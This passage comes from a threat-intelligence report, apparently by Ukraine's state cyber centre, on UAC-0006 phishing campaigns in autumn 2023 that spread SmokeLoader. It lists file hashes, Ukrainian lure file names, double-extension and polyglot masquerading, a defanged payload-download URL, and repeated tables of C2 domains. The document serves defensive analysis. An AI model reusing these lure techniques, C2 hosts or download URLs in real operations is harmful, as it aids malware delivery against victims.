876427645735.pdf.exe"). The .pdf.exe file is a WinRAR SFX archive (see
Figure 21) that contains .exe and .pdf files (namely "pax2.exe", "pax1.pdf"),
the opening of which through the WinRAR application results in
48
simultaneous extraction and execution of these .exe and .pdf files.
"pax1.pdf" here is a file decoy, the purpose of which is to distract the user's
attention from the execution of a SmokeLoader sample.
"pax2.exe" (file type - Win32 EXE) is the actual SmokeLoader sample, the C2
configuration of which is represented in Table 42 [T1071.001] (totally 19 domains, 6
among which are active).
Summarising the above, the initial email attachment can be opened in two ways.
49
Table 42. SmokeLoader sample C2 Configuration
C2 Connections Configuration
http://dublebomber.ru/
http://yavasponimayu.ru/
http://nomnetozhedenyuzhkanuzhna.ru/
http://prostosmeritesya.ru/
http://ipoluchayteudovolstvie.ru/
http://super777bomba.ru/
http://specnaznachenie.ru/
http://zakrylki809.ru/
http://propertyminsk.by/
http://iloveua.ir/
http://moyabelorussiya.by/
http://tvoyaradostetoya.ru/
http://zasadacafe.by/
http://restmantra.by/
http://kozachok777.ru/
http://propertyiran.ir/
http://sakentoshi.ru/
http://popuasyfromua.ru/
http://diplombar.by/
50
CHRONOLOGY OF APPLIED ATTACK VECTORS
Figure 22 displays the timechart of the UAC-0006 activity cluster (by the number of
phishing incidents of specific attack chains), targeting Ukraine during October 2023.
20.09.2023
0 35 70
Figure 22. Timechart of the UAC-0006 activity cluster during October 2023
(by the number of phishing incidents of specific attack chains)
02 October 2023, "Fw: Account, act of reconciliation"
The mass distribution of the SmokeLoader via phishing emails with the subject
"Fw: Рахунок, акт звiки" (eng: "Fw: Account, act of reconciliation", translation
from Ukrainian with spelling mistakes) was detected by the CIROC SCPC SSSCIP
on October 2, 2023. Tables 43 and 44 contain a brief overview of the applied attack
vector and the sequence of the infection chain that are relevant to this case.
Attack Vector
Infection Chain
31be756b4315098a94855a8b236bcf6e55d97acbc5cebe75d1a668dff45bb82b
("рахунок_фактура_СФ-0001871_та_акт_звiрки_вiд_29_09_2023р.zip") ->
90ed5f6719265e25c3483b11704e3158622128816def1f7515988b7de5f5f1de
("спісок.doc") ->
e5314f7a9969af109606c84567ecf951570dd1495c400a1e5bf215fd5cdb3fd2
("Pax_9312_0580_6944_3255_29.09.2023p.jpg") +
8b4b9b473f73b70c55d21d33149ced0c234fff919d15ff73cca22b93818a785c
("акт_звiрки_вiд_29_09_2023р_за_рах_UA493077700000026002711166191.jpeg.exe") ->
9b50c4624bd60aea94b85afeeac6d61c485bee42fdeeffedc5d9617f4650c51c
("Payment_9312_0580_6944_3255.bat") +
41fe1fea884daee189076a5bb5b288852ed5b72d3b89576b740be6baceaa69c5
("akt.jpeg")
The phishing email (observed email subject - "Fw: Рахунок, акт звiки") contains
.zip attachment [T1566.001] (polyglot archive
"рахунок_фактура_СФ-0001871_та_акт_звiрки_вiд_29_09_2023р.zip"
[T1036.008]), the unpacking of which [T1204.002] results in the execution of one
of the two scenarios:
7) extracting the .xls file "Рахунок_фактура_СФ-0001871.xls" that contains
no signs of the malicious code;
8) extracting the .doc file (ZIP archive "спісок.doc") that contains .jpg and
.jpeg.exe files [T1036.007] (namely
"Pax_9312_0580_6944_3255_29.09.2023p.jpg",
"акт_звiрки_вiд_29_09_2023р_за_рах_UA493077700000026002711166191
.jpeg.exe"). The .jpeg.exe file is a WinRAR SFX archive (see Fig. 23) that
contains .bat and .jpeg files (namely "Payment_9312_0580_6944_3255.bat",
"akt.jpeg"), the opening of which through WinRAR application results in
simultaneous extraction and execution of these .bat and .jpeg files.
52
"akt.jpeg" here is a file decoy, the purpose of which is to distract the user's
attention from the execution of a SmokeLoader sample. Figure 24
represents the content of the "Payment_9312_0580_6944_3255.bat" file, in
particular the command that is expected to be executed by the default
Windows command-line interpreter [T1059.003] (running the program
"Pax_9312_0580_6944_3255_29.09.2023p.jpg").
It was the first campaign where the "@echo off" command was added to the
content of the .bat file to prevent the prompt and content of the batch file from
being displayed.
Summarising the above, the initial email attachment can be opened in two ways.
53
Execution Scenario (1):
31be756b4315098a94855a8b236bcf6e55d97acbc5cebe75d1a668dff45bb82b
("рахунок_фактура_СФ-0001871_та_акт_звiрки_вiд_29_09_2023р.zip") ->
90ed5f6719265e25c3483b11704e3158622128816def1f7515988b7de5f5f1de
("спісок.doc") ->
e5314f7a9969af109606c84567ecf951570dd1495c400a1e5bf215fd5cdb3fd2
("Pax_9312_0580_6944_3255_29.09.2023p.jpg") +
8b4b9b473f73b70c55d21d33149ced0c234fff919d15ff73cca22b93818a785c
("акт_звiрки_вiд_29_09_2023р_за_рах_UA493077700000026002711166191.jpeg.exe") ->
9b50c4624bd60aea94b85afeeac6d61c485bee42fdeeffedc5d9617f4650c51c
("Payment_9312_0580_6944_3255.bat") +
41fe1fea884daee189076a5bb5b288852ed5b72d3b89576b740be6baceaa69c5
("akt.jpeg")
C2 Connections Configuration
http://dublebomber.ru/
http://yavasponimayu.ru/
http://nomnetozhedenyuzhkanuzhna.ru/
http://prostosmeritesya.ru/
http://ipoluchayteudovolstvie.ru/
http://super777bomba.ru/
http://specnaznachenie.ru/
http://zakrylki809.ru/
http://propertyminsk.by/
http://iloveua.ir/
http://moyabelorussiya.by/
http://tvoyaradostetoya.ru/
http://zasadacafe.by/
http://restmantra.by/
http://kozachok777.ru/
http://propertyiran.ir/
http://sakentoshi.ru/
http://popuasyfromua.ru/
http://diplombar.by/
54
04 October 2023, "Fw: Specification for act No.
НП-010140544 dated 30.09.2023"
The mass distribution of the SmokeLoader via phishing emails with the subject
"Fw: Специфікація до акту №НП-010140544 від 30.09.2023" (eng: "Fw:
Specification for act No. НП-010140544 dated 30.09.2023", translation from
Ukrainian) was detected by the CIROC SCPC SSSCIP on October 4, 2023. Tables 46
and 47 contain a brief overview of the applied attack vector and the sequence of
the infection chain that are relevant to this case.
Attack Vector
Infection Chain
55076f9a6e5ee25e2deb7b8417431bd71ff34a74c600efbd53144a9b0a178946
("Рахунок_до_акту_НП-010140544_вiд_30.09.2023_01102023223751.zip") ->
143310670009099214b1b1a812e98a485db3e2879ab35dca8ba63005a62a610c
("Акт_звiрки_вiд_03.10.2023_Рах_UA493077700000026002711166194.XLS.exe" /
"Рахунок_до_акту_НП-010140544_вiд_30.09.2023_01102023223751.XLS.exe" /
"Витяг_з_реестру_вiд_03.10.2023_Рах_UA493077700000026002711166194.XLS.exe")
Summarising the above, the initial email attachment can be opened in two ways.
55
Execution Scenario (1):
55076f9a6e5ee25e2deb7b8417431bd71ff34a74c600efbd53144a9b0a178946
("Рахунок_до_акту_НП-010140544_вiд_30.09.2023_01102023223751.zip") ->
143310670009099214b1b1a812e98a485db3e2879ab35dca8ba63005a62a610c
("Акт_звiрки_вiд_03.10.2023_Рах_UA493077700000026002711166194.XLS.exe" /
"Рахунок_до_акту_НП-010140544_вiд_30.09.2023_01102023223751.XLS.exe" /
"Витяг_з_реестру_вiд_03.10.2023_Рах_UA493077700000026002711166194.XLS.exe")
C2 Connections Configuration
http://dublebomber.ru/
http://yavasponimayu.ru/
http://nomnetozhedenyuzhkanuzhna.ru/
http://prostosmeritesya.ru/
http://ipoluchayteudovolstvie.ru/
http://super777bomba.ru/
http://specnaznachenie.ru/
http://zakrylki809.ru/
http://propertyminsk.by/
http://iloveua.ir/
http://moyabelorussiya.by/
http://tvoyaradostetoya.ru/
http://zasadacafe.by/
http://restmantra.by/
http://kozachok777.ru/
http://propertyiran.ir/
http://sakentoshi.ru/
http://popuasyfromua.ru/
http://diplombar.by/
56
05 October 2023, "Fw: Specification to act No. НП-010140..
dated 04.10.2023", "Fwd: Fw: Specification to act No.
Н-010140.. dated 04.10.2023."
The mass distribution of the SmokeLoader via phishing emails with the subjects
"Fw: Специфікація до акту №НП-010140.. від 04.10.2023р" (eng: "Fw:
Specification to act No. НП-010140.. dated 04.10.2023", translation from Ukrainian)
and "Fwd: Fw: Специфікація до акту №Н-010140.. від 04.10.2023р" (eng: "Fwd:
Fw: Specification to act No. Н-010140.. dated 04.10.2023.", translation from
Ukrainian) were detected by the CIROC SCPC SSSCIP between 5 October 2023.
Tables 49 and 50 contain a brief overview of the applied attack vector and the
sequence of the infection chain that are relevant to this case.
Attack Vector
Infection Chain
411525bb70e9579cc4dc62458bbcfc88ca44d6ca6046a43e4e2ef13873edb1a8
("Специфікація до акту №Н-010140544 від 30.09.2023.zip" / "Специфікація до акту
№НП-010140544 від 30.09.2023.zip") ->
fdf8a89e8c90ed0653780acc77c180185b8971e62d2a02dcaabcfc456d05bd96
("1.Рахунок_до_акту_НП-010140544_вiд_30.09.2023_01102023223751.XLS.js") +
493f708129bf25ff4bb734c179d336f223d9d21ea53b7e5e52f9535a72415bfd
("2.Акт_звiрки_вiд_03.10.2023_Рах_UA493077700000026002711166194.XLS.js") +
6999f5f3c6824f27b5a1fb436c59d369f6f1ec08365d48cd1c8d21d1058eaafc
("3.Витяг_з_реестру_вiд_03.10.2023_Рах_UA493077700000026002711166194.XLS.js") ->
d3bff8ee2566c13a391cec24be134d3d04ee65b87529e1c98caf93b5b559fce4
(name format "<6-DIGID-CODE>.dat")
57
2) extracting three .xls.js files [T1036.007] (namely
"1.Рахунок_до_акту_НП-010140544_вiд_30.09.2023_01102023223751.XLS.j
s",
"2.Акт_звiрки_вiд_03.10.2023_Рах_UA493077700000026002711166194.XL
S.js",
"3.Витяг_з_реестру_вiд_03.10.2023_Рах_UA493077700000026002711166
194.XLS.js") which represent the identical SmokeLoader sample but with
three different names.
Opening either of these three files through WScript.exe causes sending the HTTP
GET request (hxxp://specnaznachenie[.]ru/download/mstsc[.]exe). The response
to this request with a status code "HTTP 200 OK" is returned with the header
value "Content-Type: application/x-msdos-program" (see Figure 25), that results in
downloading a file, saving it under the hidden folder AppData located in
C:\Users\%USERNAME%\AppData [T1564.001]
("C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Templates\<6
-DIGID-CODE>.dat" path) and its further execution.
The last file with the name format "<6-DIGID-CODE>.dat" (file type - Win32 EXE) is
the actual SmokeLoader sample, the C2 configuration of which is represented in
Table 51 [T1071.001] (totally 19 domains, 6 among which are active).
Summarising the above, the initial email attachment can be opened in two ways.
58
Execution Scenario (1):
411525bb70e9579cc4dc62458bbcfc88ca44d6ca6046a43e4e2ef13873edb1a8
("Специфікація до акту №Н-010140544 від 30.09.2023.zip" / "Специфікація до акту
№НП-010140544 від 30.09.2023.zip") ->
fdf8a89e8c90ed0653780acc77c180185b8971e62d2a02dcaabcfc456d05bd96
("1.Рахунок_до_акту_НП-010140544_вiд_30.09.2023_01102023223751.XLS.js") +
493f708129bf25ff4bb734c179d336f223d9d21ea53b7e5e52f9535a72415bfd
("2.Акт_звiрки_вiд_03.10.2023_Рах_UA493077700000026002711166194.XLS.js") +
6999f5f3c6824f27b5a1fb436c59d369f6f1ec08365d48cd1c8d21d1058eaafc
("3.Витяг_з_реестру_вiд_03.10.2023_Рах_UA493077700000026002711166194.XLS.js") ->
d3bff8ee2566c13a391cec24be134d3d04ee65b87529e1c98caf93b5b559fce4
(name format "<6-DIGID-CODE>.dat")
C2 Connections Configuration
http://dublebomber.ru/
http://yavasponimayu.ru/
http://nomnetozhedenyuzhkanuzhna.ru/
http://prostosmeritesya.ru/
http://ipoluchayteudovolstvie.ru/
http://super777bomba.ru/
http://specnaznachenie.ru/
http://zakrylki809.ru/
http://propertyminsk.by/
http://iloveua.ir/
http://moyabelorussiya.by/
http://tvoyaradostetoya.ru/
http://zasadacafe.by/
http://restmantra.by/
http://kozachok777.ru/
http://propertyiran.ir/
http://sakentoshi.ru/
http://popuasyfromua.ru/
http://diplombar.by/
59
06 October 2023, "Fw: Specification to act No. НП-010140..
dated 05.10.2023"
The mass distribution of the SmokeLoader via phishing emails with the subject
"Fw: Специфікація до акту №НП-010140.. від 05.10.2023р" ("Fw: Specification
to act No. НП-010140.. dated 05.10.2023", translation from Ukrainian) was detected
by the CIROC SCPC SSSCIP on October 6, 2023. Tables 52 and 53 contain a brief
overview of the applied attack vector and the sequence of the infection chain that
are relevant to this case.
Attack Vector
Infection Chain
d895f40a994cb90416881b88fadd2de5af165eec1cd41b0ddd08fa1d6b3262bb
("Список_документiв_для_ознакомлення.pdf") ->
hxxp://ukr-net-download-files-php-name[.]ru/ukraine/7359285676597843549459074398768547684
598703475348567938653846589365936598346532742878/ukrnet/Список_документiв_для_ознай
омлення[.]zip (link) ->
41b74077e7707dfce2752668a3201e3bc596ade5594535c266e3249c2e697cb2
("Список_документiв_для_ознайомлення.zip") ->
40c9bc7186f21b6e2a7da28632e70d9b9bce01cc63c692d4383ac03e13e45533
("лист.zip" / "лист.pdf") ->
ac1aedd7d08d3e92ded28d07944d8a8039650a36dec8b4a5d7b675ce2c5512c4
("1.Рахунок_до_акту_НП-010140544_вiд_30.09.2023_01102023223751.XLS.js" /
"2.Акт_звiрки_вiд_03.10.2023_Рах_UA493077700000026002711166194.XLS.js" /
"3.Витяг_з_реестру_вiд_03.10.2023_Рах_UA493077700000026002711166194.XLS.js") +
a4aff83623cac142f178d589514c21e060f57843d729d808edc860a91772d7d7
("._1.Рахунок_до_акту_НП-010140544_вiд_30.09.2023_01102023223751.XLS.js") +
cb3aff029bd0af35ecf2567525e01847cfb5792d89ea769b7429e6d99186a88a
("._2.Акт_звiрки_вiд_03.10.2023_Рах_UA493077700000026002711166194.XLS.js") +
fb3a98c4bb3aa8f1022d4f286c1bd8008862a9c09178e5823568368c3bfbfa1c
("._3.Витяг_з_реестру_вiд_03.10.2023_Рах_UA493077700000026002711166194.XLS.js") ->
ebbf474d69519b7ded60c1dab807dab492c33d9caf76e6495c2ee92be573011e
(name format "<DIGID-CODE>.dat")
60
the specified action by the victim [T1204.001] results in sending the HTTP GET
request (see Fig.26)
hxxp://ukr-net-download-files-php-name[.]ru/ukraine/73592856765978435494
59074398768547684598703475348567938653846589365936598346532742878
/ukrnet/Список_документiв_для_ознайомлення[.]zip and downloading a .zip
file (namely "Список_документiв_для_ознайомлення.zip"), the unpacking of
which [T1204.002] leads to the execution of one of the two scenarios:
1) extracting .zip/.pdf polyglot file [T1036.008] (names that were observed -
"лист.zip", "лист.pdf") that contains three .xls.js files [T1036.007] (which
represent the identical sample of the .xls.js file, but with three different
names, namely
"1.Рахунок_до_акту_НП-010140544_вiд_30.09.2023_01102023223751.XLS.js",
"2.Акт_звiрки_вiд_03.10.2023_Рах_UA493077700000026002711166194.XLS.js
",
"3.Витяг_з_реестру_вiд_03.10.2023_Рах_UA493077700000026002711166194.
XLS.js"). Opening either of these three .xls.js files through WScript.exe
causes sending the HTTP GET request
(hxxp://specnaznachenie[.]ru/download/mstsc[.]exe). The response to
this request with a status code "HTTP 200 OK" is returned with the header
value "Content-Type: application/x-msdos-program" (see Figure 27), that
results in downloading a file, saving it under the hidden folder AppData
located in C:\Users\%USERNAME%\AppData [T1564.001]
("C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Templ
ates\<DIGID-CODE>.dat" path) and its further execution;
2) extracting .zip/.pdf polyglot file [T1036.008] (names that were observed -
"лист.zip", "лист.pdf") that contains six .xls.js files (three of which represent
the identical sample of the .xls.js file, but with three different names
(mentioned in scenario(1)), and three others are MAC OS X files (namely
"._1.Рахунок_до_акту_НП-010140544_вiд_30.09.2023_01102023223751.XL
S.js",
"._2.Акт_звiрки_вiд_03.10.2023_Рах_UA493077700000026002711166194.
XLS.js",
"._3.Витяг_з_реестру_вiд_03.10.2023_Рах_UA49307770000002600271116
6194.XLS.js")).
The last file with the name format "<DIGID-CODE>.dat" (file type - Win32 EXE) is
the actual SmokeLoader sample, the C2 configuration of which is represented in
Table 54 [T1071.001] (totally 19 domains, 6 among which are active).
61
Figure 26. Downloading "Список_документiв_для_ознайомлення.zip"
Summarising the above, the initial email attachment can be opened in two ways.
62
ac1aedd7d08d3e92ded28d07944d8a8039650a36dec8b4a5d7b675ce2c5512c4
("1.Рахунок_до_акту_НП-010140544_вiд_30.09.2023_01102023223751.XLS.js" /
"2.Акт_звiрки_вiд_03.10.2023_Рах_UA493077700000026002711166194.XLS.js" /
"3.Витяг_з_реестру_вiд_03.10.2023_Рах_UA493077700000026002711166194.XLS.js") ->
ebbf474d69519b7ded60c1dab807dab492c33d9caf76e6495c2ee92be573011e
(name format "<DIGID-CODE>.dat")
C2 Connections Configuration
http://dublebomber.ru/
http://yavasponimayu.ru/
http://nomnetozhedenyuzhkanuzhna.ru/
http://prostosmeritesya.ru/
http://ipoluchayteudovolstvie.ru/
http://super777bomba.ru/
http://specnaznachenie.ru/
http://zakrylki809.ru/
http://propertyminsk.by/
http://iloveua.ir/
http://moyabelorussiya.by/
http://tvoyaradostetoya.ru/
http://zasadacafe.by/
http://restmantra.by/
http://kozachok777.ru/
http://propertyiran.ir/
http://sakentoshi.ru/
http://popuasyfromua.ru/
http://diplombar.by/
63
06 - 07 October 2023, "Fw: Specification to act No.
NP-010140.. dated 06.10.2023"
The mass distribution of the SmokeLoader via phishing emails with the subject
"Fw: Специфікація до акту №НП-010140.. від 06.10.2023р" (eng: "Fw:
Specification to act No. NP-010140.. dated 06.10.2023", translation from Ukrainian)
was detected by the CIROC SCPC SSSCIP between 6 to 7 October 2023. Tables 55
and 56 contain a brief overview of the applied attack vector and the sequence of
the infection chain that are relevant to this case.
Attack Vector
Infection Chain
739e735aa73cfdbfc08c696e0426434aa78139110b416313d2a39d93915ee318
("лист.zip") ->
40c9bc7186f21b6e2a7da28632e70d9b9bce01cc63c692d4383ac03e13e45533
("лист.pdf") ->
ac1aedd7d08d3e92ded28d07944d8a8039650a36dec8b4a5d7b675ce2c5512c4
("1.Рахунок_до_акту_НП-010140544_вiд_30.09.2023_01102023223751.XLS.js" /
"2.Акт_звiрки_вiд_03.10.2023_Рах_UA493077700000026002711166194.XLS.js" /
"3.Витяг_з_реестру_вiд_03.10.2023_Рах_UA493077700000026002711166194.XLS.js")
d3bff8ee2566c13a391cec24be134d3d04ee65b87529e1c98caf93b5b559fce4
(name format "<6-DIGID-CODE>.dat")
64
WScript.exe causes sending the HTTP GET request
(hxxp://specnaznachenie[.]ru/download/mstsc[.]exe). The response to
this request with a status code "HTTP 200 OK" is returned with the header
value "Content-Type: application/x-msdos-program" (see Figure 28), that
results in downloading a file, saving it under the hidden folder AppData
located in C:\Users\%USERNAME%\AppData [T1564.001]
("C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Templ
ates\<6-DIGID-CODE>.dat" path) and its further execution.
The last file with the name format "<6-DIGID-CODE>.dat" (file type - Win32 EXE) is
the actual SmokeLoader sample, the C2 configuration of which is represented in
Table 57 [T1071.001] (totally 19 domains, 6 among which are active).
Summarising the above, the initial email attachment can be opened in two ways.
65
Execution Scenario (2):
739e735aa73cfdbfc08c696e0426434aa78139110b416313d2a39d93915ee318
("лист.zip") ->
0f93344347469ebef7b0d6768f6f50928b8e6df7bc84a4293b7c4a7bb5b98072
("ЗАЯВА.xlsx")
C2 Connections Configuration
http://dublebomber.ru/
http://yavasponimayu.ru/
http://nomnetozhedenyuzhkanuzhna.ru/
http://prostosmeritesya.ru/
http://ipoluchayteudovolstvie.ru/
http://super777bomba.ru/
http://specnaznachenie.ru/
http://zakrylki809.ru/
http://propertyminsk.by/
http://iloveua.ir/
http://moyabelorussiya.by/
http://tvoyaradostetoya.ru/
http://zasadacafe.by/
http://restmantra.by/
http://kozachok777.ru/
http://propertyiran.ir/
http://sakentoshi.ru/
http://popuasyfromua.ru/
http://diplombar.by/
66
10 - 11 October 2023, "Fw: Reconciliation act for the 3rd
quarter of 2023."
The mass distribution of the SmokeLoader via phishing emails with the subject
"Fw: Акт звірки за 3 кв.2023р." (eng: "Fw: Reconciliation act for the 3rd quarter
of 2023.") was detected by the CIROC SCPC SSSCIP between 10 to 11 October 2023.
Tables 58 and 59 contain a brief overview of the applied attack vector and the
sequence of the infection chain that are relevant to this case.
Attack Vector
Infection Chain
fc599616464635cd824e199d2d02c5c78d0f10bcf02a657d4144849d06c7cccf
("Акт звірки взаєморозрахунків № 797 від 06.10.2023.zip") ->
f2989f4526295db77ac4e9e10fb26a7ff5c9e7fd19485d72d2cb16093d5a967d
("список.docx") ->
33733489e56cae26f1974de014c2004fb75c0a07b8d544545926a2c452a64ef2
("акт_звiрки_вiд_09_10_2023р.pdf.js" / "рахунок_фактура_вiд_05_10_2023р.pdf.js") ->
d3bff8ee2566c13a391cec24be134d3d04ee65b87529e1c98caf93b5b559fce4
(name format "<6-DIGID-CODE>.dat")
The phishing email (observed email subject - "Fw: Акт звірки за 3 кв.2023р.")
contains .zip attachment [T1566.001] (polyglot archive "Акт звірки
взаєморозрахунків № 797 від 06.10.2023.zip" [T1036.008]), the unpacking of
which [T1204.002] results in the execution of one of the two scenarios:
1) extracting the .pdf file "Акт звірки взаєморозрахунків № 797 від
06.10.2023.pdf", that contains no signs of the malicious content;
2) extracting "список.docx" file (ZIP archive) that contains 2 .pdf.js files
[T1036.007] (which represent the identical sample of the .pdf.js file, but
with three different names). Opening either of these two files through
WScript.exe causes sending the HTTP GET request
(hxxp://specnaznachenie[.]ru/download/mstsc[.]exe). The response to
this request with a status code "HTTP 200 OK" is returned with the header
value "Content-Type: application/x-msdos-program" (see Figure 29), that
results in downloading a file, saving it under the hidden folder AppData
located in C:\Users\%USERNAME%\AppData [T1564.001]
("C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Templ
ates\<6-DIGID-CODE>.dat" path) and its further execution.
67
Figure 29. Downloading SmokeLoader sample
The last file with the name format "<6-DIGID-CODE>.dat" (file type - Win32 EXE) is
the actual SmokeLoader sample, the C2 configuration of which is represented in
Table 60 [T1071.001] (totally 19 domains, 6 among which are active).
Summarising the above, the initial email attachment can be opened in two ways.
68
Table 60. SmokeLoader sample C2 Configuration
C2 Connections Configuration
http://dublebomber.ru/
http://yavasponimayu.ru/
http://nomnetozhedenyuzhkanuzhna.ru/
http://prostosmeritesya.ru/
http://ipoluchayteudovolstvie.ru/
http://super777bomba.ru/
http://specnaznachenie.ru/
http://zakrylki809.ru/
http://propertyminsk.by/
http://iloveua.ir/
http://moyabelorussiya.by/
http://tvoyaradostetoya.ru/
http://zasadacafe.by/
http://restmantra.by/
http://kozachok777.ru/
http://propertyiran.ir/
http://sakentoshi.ru/
http://popuasyfromua.ru/
http://diplombar.by/
69
CHRONOLOGY OF APPLIED ATTACK VECTORS
Figure 30 displays the timechart of the UAC-0006 activity cluster (by the number of
phishing incidents of specific attack chains), targeting Ukraine during November 2023.
09-23.11.2023
0 40 80
Figure 30. Timechart of the UAC-0006 activity cluster during November 2023
(by the number of phishing incidents of specific attack chains)
31 October - 1 November 2023, "FW: Order No.
71-004308263 dated 30.10.2023"
The mass distribution of the SmokeLoader via phishing emails with the subject
"FW: Замовлення №71-004308263 від 30.10.2023" (eng: "FW: Order No.
71-004308263 dated 30.10.2023") was detected by the CIROC SCPC SSSCIP
between 31 October to 1 November 2023. Tables 61 and 62 contain a brief overview
of the applied attack vector and the sequence of the infection chain that are
relevant to this case.
Attack Vector
Infection Chain
7dd271fc051693da3e8e735472ab2ead072c599169ec6ebf54997996b798772b
("71-004308263-31102023.zip") ->
c8ce6c89922e752df3cc9719ae19fa6e50c07ad99b7eda2eec995ab37febf428
("Cписок.document") ->
42e8e787e55709c8058838ab3e8e2770e7e8d0556f1a8fdc7fd5af4481a44aa5
("Акт_звiрки_по рахунку_ UA513225400000026009101040301.pdf.js" /
"Рахунок_вiд_30_10_2023р_71-004308263-30102023.pdf.js" /
"Рахунок_вiд_30_10_2023р_72-004308263-30102023.pdf.js") ->
5d72dd3ea91f2f0c953a68078201bc75ef4bc71756e83261cd03177f60dab70f
(name format "<6-DIGID-CODE>.dat")
71
("C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Templ
ates\<6-DIGID-CODE>.dat" path) and its further execution. The last file
with the name format "<6-DIGID-CODE>.dat" (file type - Win32 EXE) is the
actual SmokeLoader sample, the C2 configuration of which is represented
in Table 63 [T1071.001] (totally 19 domains, 6 among which are active).
Summarising the above, the initial email attachment can be opened in two ways.
72
Table 63. SmokeLoader sample C2 Configuration
C2 Connections Configuration
http://dublebomber.ru/
http://yavasponimayu.ru/
http://nomnetozhedenyuzhkanuzhna.ru/
http://prostosmeritesya.ru/
http://ipoluchayteudovolstvie.ru/
http://super777bomba.ru/
http://specnaznachenie.ru/
http://zakrylki809.ru/
http://propertyminsk.by/
http://iloveua.ir/
http://moyabelorussiya.by/
http://tvoyaradostetoya.ru/
http://zasadacafe.by/
